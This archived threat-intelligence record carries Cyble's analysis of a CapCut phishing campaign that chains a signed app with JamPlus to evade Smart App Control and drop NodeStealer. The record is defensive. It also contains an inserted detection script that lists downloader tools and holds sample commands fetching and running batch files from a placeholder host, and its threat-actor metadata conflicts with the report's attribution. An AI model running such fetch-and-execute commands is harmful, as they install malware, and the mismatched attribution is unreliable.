{
	"id": "e51aa615-020a-4c43-a29d-9a3e43c13323",
	"created_at": "2026-04-06T00:19:30.929217Z",
	"updated_at": "2026-04-10T03:36:47.849515Z",
	"deleted_at": null,
	"sha1_hash": "3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93",
	"title": "JamPlus: Bypassing Smart App Control Via Reputation Hijack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1033916,
	"plain_text": "JamPlus: Bypassing Smart App Control Via Reputation Hijack\r\nPublished: 2024-09-09 · Archived: 2026-04-05 17:20:52 UTC\r\nCyble analyzes how threat actors use reputation hijacking and the JamPlus build utility to bypass Smart App Control (SAC),\r\nenabling seamless delivery of malicious payloads such as stealers.\r\nKey takeaways\r\nCyble Research and Intelligence Labs (CRIL) has detected a phishing site masquerading as a CapCut download page.\r\nThe site aims to trick users into downloading malicious software.\r\nThreat actors (TAs) have leveraged a reputation-hijacking technique by bundling a legitimate CapCut-signed\r\napplication inside the malicious download, exploiting the trust placed in well-known apps to bypass\r\nsecurity controls.\r\nThis campaign uses a recently demonstrated proof-of-concept (PoC) that repurposes the JamPlus build utility to\r\nexecute malicious scripts while evading detection.\r\nThe attack unfolds in multiple stages, combining legitimate tools, fileless methods, and reputable code\r\nrepositories such as GitHub to appear legitimate and circumvent traditional security measures.\r\nThe campaign’s final payload is a variant of NodeStealer, designed to capture sensitive user information and\r\nexfiltrate it through a Telegram channel.\r\nOverview\r\nCapCut, a video editing tool developed by ByteDance, has become increasingly popular, and CapCut-themed lures have\r\nbecome correspondingly common in phishing campaigns.\r\nCyble Research & Intelligence Labs (CRIL) previously identified several phishing websites impersonating the CapCut video\r\neditor and discussed those findings in earlier blog posts. 
Our latest research uncovers a new CapCut-themed\r\ncampaign deploying stealers such as NodeStealer.\r\nAdditionally, TAs have adopted the recently identified technique of reputation hijacking with the JamPlus build utility to\r\ndeliver final payloads to victims’ systems. This tactic highlights an evolving trend in attack strategies aimed at\r\nbypassing security controls and increasing the success rate of malicious campaigns.\r\nThe initial infection occurs when a user downloads a malicious package from a CapCut phishing site. The package contains\r\na legitimate CapCut application, the JamPlus build utility, and a malicious “.lua” script. When the user runs the legitimate\r\nCapCut application, it launches the JamPlus build utility, which in turn executes the malicious “.lua” script. Because every\r\nexecutable in this chain is a genuine, well-known binary, the execution of the script is masked behind their reputation.\r\nThe script then downloads a batch file that subsequently fetches and executes the final payload from a remote server.\r\nThe TAs keep the payloads fileless wherever possible.\r\nThis multi-stage process ultimately deploys a stealer payload that resembles NodeStealer. 
The image below provides an\r\noverview of the infection chain.\r\nhttps://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/\r\nPage 1 of 7\n\nFigure 1 – Infection chain\r\nTechnical Details\r\nIn this campaign, TAs trick users into downloading a malicious package disguised as a CapCut installer from a phishing site,\r\nas shown below.\r\nFigure 2 – Phishing site\r\nWhen the user clicks the “Download” button on the phishing site, it initiates the download of an archive named\r\n“CapCut_{random number}_Installer” from the URL:\r\n“hxxps://www[.]dropbox[.]com/scl/fi/6se0kgmo7sbngtdf8r11x/CapCut_7376550521366298640_installer.zip?\r\nrlkey=7fxladl3fdhpne6p7buz48kcl&st=pzxtrcqc&dl=1”.\r\nUpon extracting the downloaded archive, the user encounters what appears to be a CapCut installer; however, it is a\r\nlegitimate CapCut application rather than an installer, as shown in Figure 3. The package also includes hidden files intended\r\nfor malicious activities.\r\nFigure 3 – Zip file contents without hidden files\r\nAfter revealing the hidden files, we discovered that the package contains the JamPlus build utility and a malicious “.lua”\r\nscript, as shown below.\r\nFigure 4 – Extracted content, including hidden files\r\nBy default, launching the CapCut shortcut from the desktop runs the CapCut application located at\r\n“C:\\Users\\<User_Name>\\AppData\\Local\\CapCut\\Apps\\capcut.exe”. 
This “capcut.exe” file identifies the latest installed CapCut\r\nversion and then executes the application from the corresponding version folder, as shown below.\r\nFigure 5 – Execution flow of the legitimate CapCut application\r\nIn this campaign, the TAs abused this behavior by placing a renamed JamPlus build utility where the launcher expects the actual\r\nCapCut application, as shown below.\r\nFigure 6 – CapCut application executing JamPlus build utility\r\nIn our tests, the JamPlus utility was not executed because the file did not carry the expected name, “capcut.exe,” indicating a\r\npossible naming error by the TA. Renaming the file to “capcut.exe” successfully triggers execution of\r\nthe JamPlus build utility.\r\nUpon successful execution, the builder reads instructions from a “.jam” file, which is configured to point at the malicious\r\n“.lua” script, as shown below.\r\nFigure 7 – Contents of the .jam file\r\nAfter locating the malicious “.lua” script, the JamPlus build utility loads it, and the script executes a shell\r\ncommand, as shown in the figure below. This command uses “curl” to silently download a batch file from a remote\r\nserver and save it as “C:\\Users\\Public\\steal.bat”, and then executes the downloaded batch file.\r\nThis is how the TAs used a legitimate CapCut application together with the JamPlus build utility to evade Smart App\r\nControl: SAC decides what may run based on the reputation of the executable, every executable in this chain is a legitimate,\r\nwell-known binary, and the attacker-controlled logic lives only in the “.lua” script and in the fileless stages that follow, so\r\nSAC has nothing to block and no security alert is raised.\r\nFigure 8 – Content of the .lua file\r\nThe batch file contains multiple PowerShell commands that perform the following actions:\r\n1. 
Downloads a file named “WindowSafety.bat” from the remote URL\r\n“hxxps://raw[.]githubusercontent.com/LoneNone1807/batman/main/startup” and saves it in the Startup folder, ensuring it\r\nruns automatically at the next logon.\r\n2. Downloads a ZIP file named “Document.zip” from another remote URL\r\n“hxxps://github[.]com/LoneNone1807/batman/raw/main/Document.zip” and saves it in the public directory\r\n(“C:\\Users\\Public\\Document.zip”).\r\n3. Extracts the contents of “Document.zip” into a folder named “Document” within the public directory\r\n(“C:\\Users\\Public\\Document”).\r\n4. Finally, the batch script executes a Python script named “sim.py”, located in the extracted folder.\r\nThe image below shows the contents of the Python script.\r\nFigure 9 – sim.py contents\r\nThe newly launched Python script retrieves base64-encoded data from a further remote server, as highlighted in the above\r\nimage, decodes it, and executes the resulting payload directly in memory without writing it to disk. This payload is a Python-based information stealer identified as NodeStealer.\r\nNodeStealer\r\nNodeStealer is a sophisticated stealer that targets a wide range of sensitive data on a victim’s machine. It steals login\r\ncredentials, cookies, credit card details, and autofill data from both Chromium-based and Gecko-based web browsers.\r\nAdditionally, it extracts information from Facebook Ads Manager, Facebook Business accounts, and Facebook Graph API\r\npages. NodeStealer also targets browser extensions, including crypto wallets, password managers, VPNs, and gaming\r\napplications. All the collected information is then exfiltrated to the TAs via Telegram. This attack has been attributed to a\r\nthreat actor operating from Vietnam.\r\nBroader pattern of attacks\r\nWe have also identified another campaign where TAs used similar techniques to deliver RedLine Stealer. 
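The lure application varies between these campaigns (CapCut here, Postman in the RedLine case) while the execution chain does not, so detection is better keyed on the chain than on the bundled application. The following Python is an added example and not code from Cyble’s report or from the threat actor: it evaluates behavioural rules over Sysmon-style process-creation events. The event field names, the OriginalFileName values, the LURE_APPS set and every sample event are constructed for illustration, and the technique IDs for ingress tool transfer (T1105) and command and scripting interpreter (T1059) are added beyond those in the page’s ATT&CK table.

```python
# Added example: behavioural rules for the reputation-hijack chain described
# on this page, evaluated over Sysmon-style process-creation events.
# Field names, OriginalFileName values and all sample events are constructed.

BACKSLASH = chr(92)  # the Windows path separator, held as a named constant

# Reputable signed applications the page reports hosting the chain.
LURE_APPS = {'capcut.exe', 'postman.exe'}
# Utilities the chain uses to fetch payloads...
DOWNLOADERS = {'curl.exe', 'powershell.exe', 'pwsh.exe', 'certutil.exe', 'bitsadmin.exe'}
# ...and to run them.
INTERPRETERS = {'cmd.exe', 'python.exe', 'pythonw.exe', 'wscript.exe', 'cscript.exe'}
# World-writable staging directory (C:/Users/Public) and the Startup folder
# used for persistence, both matched after normalisation.
PUBLIC_DIR = '/users/public/'
STARTUP_DIR = '/start menu/programs/startup/'


def norm(path):
    '''Lower-case and use forward slashes so rules match either separator.'''
    return path.lower().replace(BACKSLASH, '/')


def basename(path):
    '''Final path component after normalisation.'''
    return norm(path).rsplit('/', 1)[-1]


def analyse(event):
    '''Return the list of (rule, ATT&CK technique) hits for one event.'''
    hits = []
    image = basename(event['image'])
    parent = basename(event['parent_image'])
    cmd = norm(event['command_line'])
    original = basename(event.get('original_file_name', ''))

    # R1: a file carrying a trusted app name whose PE OriginalFileName
    # (recorded by Sysmon EID 1) says otherwise: JamPlus renamed to capcut.exe.
    if image in LURE_APPS and original and original != image:
        hits.append(('R1 renamed binary masquerading as ' + image, 'T1036.008'))
    # R2: a reputable app, or its namesake, spawning a shell or downloader.
    if parent in LURE_APPS and image in DOWNLOADERS | INTERPRETERS:
        hits.append(('R2 ' + parent + ' spawned ' + image, 'T1204'))
    # R3: downloader writing into Public or Startup (steal.bat, Document.zip,
    # WindowSafety.bat).
    if image in DOWNLOADERS and (PUBLIC_DIR in cmd or STARTUP_DIR in cmd):
        hits.append(('R3 ' + image + ' writing into Public/Startup', 'T1105'))
    # R4: interpreter executing content staged in Public (steal.bat, sim.py).
    if image in INTERPRETERS and PUBLIC_DIR in cmd:
        hits.append(('R4 ' + image + ' running content from Public', 'T1059'))
    return hits


def triage(events):
    '''Map event id -> hits, keeping only events that matched a rule.'''
    findings = {}
    for event in events:
        hits = analyse(event)
        if hits:
            findings[event['id']] = hits
    return findings


# Constructed telemetry modelled on the infection chain; forward slashes are
# used here, real Sysmon events carry backslashes and norm() accepts both.
SAMPLE_EVENTS = [
    {'id': 1, 'parent_image': 'C:/Windows/explorer.exe',
     'image': 'C:/Users/victim/Downloads/CapCut_Installer/capcut.exe',
     'original_file_name': 'capcut.exe', 'command_line': 'capcut.exe'},
    # the genuine launcher hands off to a version folder holding renamed JamPlus
    {'id': 2, 'parent_image': 'C:/Users/victim/Downloads/CapCut_Installer/capcut.exe',
     'image': 'C:/Users/victim/Downloads/CapCut_Installer/4.0.0/capcut.exe',
     'original_file_name': 'jam.exe', 'command_line': 'capcut.exe'},
    # the .lua script shells out: fetch steal.bat, then run it
    {'id': 3, 'parent_image': 'C:/Users/victim/Downloads/CapCut_Installer/4.0.0/capcut.exe',
     'image': 'C:/Windows/System32/cmd.exe',
     'command_line': 'cmd.exe /c curl -s -o C:/Users/Public/steal.bat '
                     'hxxps://example.invalid/steal.bat && C:/Users/Public/steal.bat'},
    {'id': 4, 'parent_image': 'C:/Windows/System32/cmd.exe',
     'image': 'C:/Windows/System32/curl.exe',
     'command_line': 'curl -s -o C:/Users/Public/steal.bat hxxps://example.invalid/steal.bat'},
    # persistence stage of steal.bat
    {'id': 5, 'parent_image': 'C:/Windows/System32/cmd.exe',
     'image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'command_line': 'powershell -w hidden -c Invoke-WebRequest hxxps://example.invalid/startup '
                     '-OutFile C:/Users/victim/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/WindowSafety.bat'},
    # sim.py launched from the extracted Document folder
    {'id': 6, 'parent_image': 'C:/Windows/System32/cmd.exe',
     'image': 'C:/Users/Public/Document/python.exe',
     'command_line': 'python.exe C:/Users/Public/Document/sim.py'},
    # benign: a user fetching a file into their own profile
    {'id': 7, 'parent_image': 'C:/Windows/System32/cmd.exe',
     'image': 'C:/Windows/System32/curl.exe',
     'command_line': 'curl -o C:/Users/victim/Downloads/report.pdf https://example.invalid/report.pdf'},
]

if __name__ == '__main__':
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        for rule, technique in hits:
            print(f'event {event_id}: {rule} ({technique})')
```

R1 depends on the PE OriginalFileName field, which Sysmon process-creation events carry; compare it against the value observed on a genuine install rather than assuming it equals the file name. Events 1 and 7 are benign controls and match nothing, while the renamed JamPlus, the curl and PowerShell downloads into Public and Startup, and the Python run from Public each trip one or two rules.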
In that campaign,\r\nthe TAs paired a legitimately signed Postman application with the JamPlus build utility. The image below\r\nshows that the malicious package includes the Postman application.\r\nFigure 10 – Postman application used in a similar campaign\r\nConclusion\r\nThe hijacking of reputable applications together with the JamPlus build utility illustrates an effective method for\r\nbypassing Smart App Control without triggering security alerts. This approach raises the complexity and\r\neffectiveness of attacks and complicates detection and defense. The deployment of NodeStealer, which harvests\r\nsensitive information from the victim’s system, underlines what is at stake.\r\nRecommendations\r\nBefore accessing or downloading from any site, diligently verify the URL.\r\nConsider disabling or limiting the execution of scripting languages on user workstations and servers if they are not\r\nessential for legitimate purposes.\r\nImplement comprehensive monitoring and logging to detect unusual activity associated with reputable applications, such as a\r\nsigned consumer application spawning a shell, a downloader, or a script interpreter.\r\nEmploy application allowlisting so that only approved applications can run. Because the CapCut launcher in this chain is\r\ngenuinely signed, rules that trust a publisher or a reputation score alone are not enough; pair them with path or hash rules\r\nand explicitly deny script-capable build tools such as JamPlus where they have no business purpose.\r\nStay updated with the latest threat intelligence and cybersecurity trends to understand new tactics and techniques\r\nused by attackers, and adapt defense strategies accordingly.\r\nSet up network-level monitoring to detect unusual activity or data exfiltration by malware. 
Block suspicious\r\nactivity to prevent potential breaches.\r\nMITRE ATT&CK® Techniques\r\nTactic | Technique | Description\r\nInitial Access (TA0001) | Phishing (T1566) | Malware distribution via a phishing site\r\nExecution (TA0002) | User Execution (T1204) | The user must manually execute the file downloaded from the phishing site\r\nExecution (TA0002) | Command and Scripting Interpreter: Python (T1059.006) | Python stealer targeting Windows users\r\nDefense Evasion (TA0005) | Masquerading (T1036.008) | Downloaded file disguised as a legitimate application\r\nCredential Access (TA0006) | Steal Web Session Cookie (T1539) | Steals browser cookies\r\nCollection (TA0009) | Archive Collected Data (T1560) | Stealer compresses the stolen data into a ZIP archive\r\nExfiltration (TA0010) | Exfiltration Over Web Service (T1567) | Uses a Telegram channel to exfiltrate data\r\nIndicators of Compromise (IOCs)\r\nIndicator | Type | Description\r\n8e6bbe8ac1ecdd230a4dcafa981ff00663fae06f7b85b117a87917b6f04f894f | SHA256 | CapCut_7376550521366298640_i\r\n4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10 | SHA256 | JamPlus Builder – POC file\r\n56d3ba2b661e8d8dfe38bcef275547546b476c35d18aa4ec89eea73c2e2aeb7c | SHA256 | Python Stealer\r\nhxxps://raw[.]githubusercontent[.]com/LoneNone1807/batman/main/steal[.]bat | URL | Remote server\r\nhxxps://cap-cutdownload[.]com/ | URL | Phishing site\r\n169f7d182f7838b75737c23e1b08c4b6b303d2d6a1cb73cdb87bd9644878a027 | SHA256 | Copyright-infringement-images.zip\r\nReferences\r\nhttps://www.netskope.com/blog/new-python-nodestealer-goes-beyond-facebook-credentials-now-stealing-all-browser-cookies-and-login-credentials\r\nhttps://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+Redline/31204\r\nhttps://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business\r\nhttps://www.elastic.co/security-labs/dismantling-smart-app-control\r\nSource: https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/"
	],
	"report_names": [
		"reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434770,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93.pdf",
		"text": "https://archive.orkl.eu/3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93.txt",
		"img": "https://archive.orkl.eu/3f05e5ce52648d0cf92977b9c8e8b81bd8d2ae93.jpg"
	}
}